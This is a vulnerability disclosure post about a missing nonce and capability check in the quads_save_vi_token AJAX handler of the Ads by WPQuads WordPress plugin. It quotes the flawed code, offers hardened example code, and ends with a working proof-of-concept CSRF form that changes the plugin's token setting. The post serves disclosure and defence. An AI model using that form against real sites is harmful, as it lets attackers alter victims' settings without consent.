27 Jan 2023

Authenticated Settings Change Vulnerability in Ads by WPQuads

One of the changelog entries for a recent version of the WordPress plugin Ads by WPQuads suggested a vulnerability was fixed:

Fixed: Nonce missing inside ajax call handler quads_send_feedback #670

The number there is a reference to a GitHub issue for the plugin, which lacks any more details on the issue.

Looking at the changes made in the version this was supposed to be addressed in, we found a nonce check being added to somewhere it isn’t needed, since the nonce check would have already happened. It wasn’t added to the function referenced in the changelog and there hasn’t been a nonce check added there in a subsequent version. That function, quads_send_feedback(), is located in the file /includes/helper-functions.php.

That function is for sending feedback to the developer, so the security risk there seems rather limited. Looking at the plugin’s code, though, we found that other AJAX accessible functions are similarly still not secured.

For example, in the file /includes/admin/admin-actions.php, the function is made accessible to anyone logged in to WordPress:

add_action('wp_ajax_quads_save_vi_token', 'quads_save_vi_token');

That function will save a token for the plugin without checking for a nonce (the check that prevents cross-site request forgery (CSRF)), and also without doing a capabilities check to limit who is allowed to change the setting:

function quads_save_vi_token() {
    global $quads_options;
 
    // Only the presence of the token is checked; there is no nonce check
    // and no capabilities check before this point
    if (empty($_POST['token'])) {
        echo json_encode(array("status" => "failed"));
        wp_die();
    }
 
    // Save token before trying to create ads.txt
    // The unvalidated POST value is written straight to the option
    update_option('quads_vi_token', $_POST['token']);

So any user logged in to WordPress can change that setting, and an attacker could cause a logged-in user to change it without intending to through CSRF.
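For comparison, here is how the same AJAX handler looks with the two missing checks in place. This is an added example written for this post, not the plugin's code or the developer's fix; the nonce action name, the nonce field name and the manage_options capability are assumptions chosen for illustration.

```php
<?php
// Added example (not the plugin's code): hardened version of the AJAX handler.
// Assumes the admin page that posts the token also sends a nonce created with
// wp_create_nonce('quads_save_vi_token') in a POST field named 'nonce'.

// Register on wp_ajax_ only (logged-in users); no wp_ajax_nopriv_ hook is added.
add_action('wp_ajax_quads_save_vi_token', 'quads_save_vi_token_hardened');

function quads_save_vi_token_hardened() {
    // 1. CSRF protection: reject the request unless it carries a valid nonce.
    //    With the third argument set to false, check_ajax_referer() returns false
    //    instead of dying, so a JSON error can be returned to the caller.
    if (!check_ajax_referer('quads_save_vi_token', 'nonce', false)) {
        wp_send_json_error(array('status' => 'invalid_nonce'), 403);
    }

    // 2. Authorization: admin-ajax.php is reachable by any logged-in user
    //    (subscribers included), so restrict the change to users who may
    //    manage settings. 'manage_options' is an assumed choice of capability.
    if (!current_user_can('manage_options')) {
        wp_send_json_error(array('status' => 'forbidden'), 403);
    }

    // 3. Input validation: require a non-empty, sanitized token before
    //    writing anything to the database.
    $token = isset($_POST['token'])
        ? sanitize_text_field(wp_unslash($_POST['token']))
        : '';
    if ($token === '') {
        wp_send_json_error(array('status' => 'failed'), 400);
    }

    update_option('quads_vi_token', $token);
    wp_send_json_success(array('status' => 'saved'));
}

// The admin-side script that calls this handler must be given the matching
// nonce, for example via wp_localize_script(), and post it as the 'nonce'
// field alongside 'token':
//
// wp_localize_script('quads-admin', 'quadsAjax', array(
//     'url'   => admin_url('admin-ajax.php'),
//     'nonce' => wp_create_nonce('quads_save_vi_token'),
// ));
```

With these checks, the proof of concept form below fails at the nonce check even when the victim is logged in, and a logged-in user without the required capability is refused at the second check.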

We notified the developer of the issue yesterday, but we have yet to receive a response and the issue has not been resolved.

Proof of Concept

The following proof of concept will change the quads_vi_token WordPress setting (option) to “proofofconcept”, when logged in to WordPress.

Replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=quads_save_vi_token" method="POST">
<input type="hidden" name="token" value="proofofconcept" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
